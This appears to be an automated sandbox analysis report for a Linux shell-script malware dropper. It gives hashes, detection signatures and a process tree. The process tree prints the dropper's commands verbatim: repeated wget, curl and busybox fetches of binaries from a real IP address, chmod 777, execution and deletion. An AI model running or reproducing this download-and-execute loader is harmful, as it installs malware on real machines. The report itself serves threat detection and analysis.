Analysis
-
max time kernel
20s -
max time network
21s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 01:44
Static task
static1
Behavioral task
behavioral1
Sample
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
-
Size
10KB
-
MD5
bfe3d249b6508a12db9768a04b73f517
-
SHA1
db227d5165875c1ff5204cbff31fd0cd47cad3cd
-
SHA256
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9
-
SHA512
f09d55be45117aa3959abf5049eff0283edea080c158c33f2efc02d03ac47e2bcf17eaa333a514e8617670308d41f4faf4d4795f49e32d98d4bcdaab874d08a2
-
SSDEEP
96:bNlrDkvnIeGl6WbjfLzSvTcI4xwMLLeO6qFlrDki2IeGl6WrkLkV9ZFLzSvTwP5v:bNlrDkvnyFLeOx7rDkAP9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 22 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 852 chmod 864 chmod 674 chmod 685 chmod 708 chmod 758 chmod 805 chmod 840 chmod 870 chmod 790 chmod 846 chmod 858 chmod 694 chmod 723 chmod 776 chmod 828 chmod 876 chmod 882 chmod 740 chmod 768 chmod 822 chmod 834 chmod -
Executes dropped EXE 22 IoCs
ioc pid Process /tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP 676 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP /tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ 686 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ /tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy 696 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy /tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ 710 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ /tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F 724 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F /tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J 742 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J /tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id 760 GtTyy46k97PMs25DsIOKewPL4B9poyk8id /tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 769 gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 /tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln 777 DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln /tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N 791 O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N /tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC 807 QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC /tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N 823 a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N /tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX 829 zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX /tmp/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq 835 LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq /tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP 841 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP /tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ 847 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ /tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy 853 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy /tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ 859 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ /tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F 865 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F /tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J 871 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J /tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id 877 GtTyy46k97PMs25DsIOKewPL4B9poyk8id /tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 883 gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 -
Checks CPU configuration 1 TTPs 22 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 22 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 curl File opened for modification /tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy curl File opened for modification /tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ curl File opened for modification /tmp/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq curl File opened for modification /tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F curl File opened for modification /tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N curl File opened for modification /tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX curl File opened for modification /tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F curl File opened for modification /tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln curl File opened for modification /tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N curl File opened for modification /tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC curl File opened for modification /tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J curl File opened for modification /tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id curl File opened for modification /tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ curl File opened for modification /tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J curl File opened for modification /tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id curl File opened for modification /tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 curl File opened for modification /tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ curl File opened for modification /tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP curl File opened for modification /tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP curl File opened for modification /tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ curl File opened for modification /tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy curl
Processes
-
/tmp/5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh/tmp/5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh1⤵PID:647
-
/bin/rm/bin/rm bins.sh2⤵PID:650
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:653
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:663
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:671
-
-
/bin/chmodchmod 777 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- File and Directory Permissions Modification
PID:674
-
-
/tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP./P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Executes dropped EXE
PID:676
-
-
/bin/rmrm P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:677
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:679
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:682
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:684
-
-
/bin/chmodchmod 777 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- File and Directory Permissions Modification
PID:685
-
-
/tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ./QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Executes dropped EXE
PID:686
-
-
/bin/rmrm QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:687
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:688
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:689
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:691
-
-
/bin/chmodchmod 777 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy./2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Executes dropped EXE
PID:696
-
-
/bin/rmrm 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:697
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:698
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:701
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:706
-
-
/bin/chmodchmod 777 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- File and Directory Permissions Modification
PID:708
-
-
/tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ./QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Executes dropped EXE
PID:710
-
-
/bin/rmrm QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:711
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:712
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:716
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:720
-
-
/bin/chmodchmod 777 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F./uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Executes dropped EXE
PID:724
-
-
/bin/rmrm uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:725
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:727
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:736
-
-
/bin/chmodchmod 777 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J./Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:755
-
-
/bin/chmodchmod 777 GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id./GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:762
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:763
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:767
-
-
/bin/chmodchmod 777 gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7./gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:770
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:771
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:772
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:773
-
-
/bin/chmodchmod 777 DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln./DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:778
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:779
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:782
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:787
-
-
/bin/chmodchmod 777 O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N./O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:793
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:802
-
-
/bin/chmodchmod 777 QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC./QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:808
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:821
-
-
/bin/chmodchmod 777 a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N./a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:824
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵PID:825
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵PID:827
-
-
/bin/chmodchmod 777 zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX./zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵PID:831
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵PID:833
-
-
/bin/chmodchmod 777 LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq./LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵PID:836
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:837
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:839
-
-
/bin/chmodchmod 777 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP./P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:842
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:843
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:845
-
-
/bin/chmodchmod 777 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ./QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:848
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:849
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:851
-
-
/bin/chmodchmod 777 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy./2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:854
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:855
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:857
-
-
/bin/chmodchmod 777 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ./QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:860
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:861
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:863
-
-
/bin/chmodchmod 777 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F./uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:866
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:867
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:869
-
-
/bin/chmodchmod 777 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J./Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:872
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:873
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:875
-
-
/bin/chmodchmod 777 GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id./GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- Executes dropped EXE
PID:877
-
-
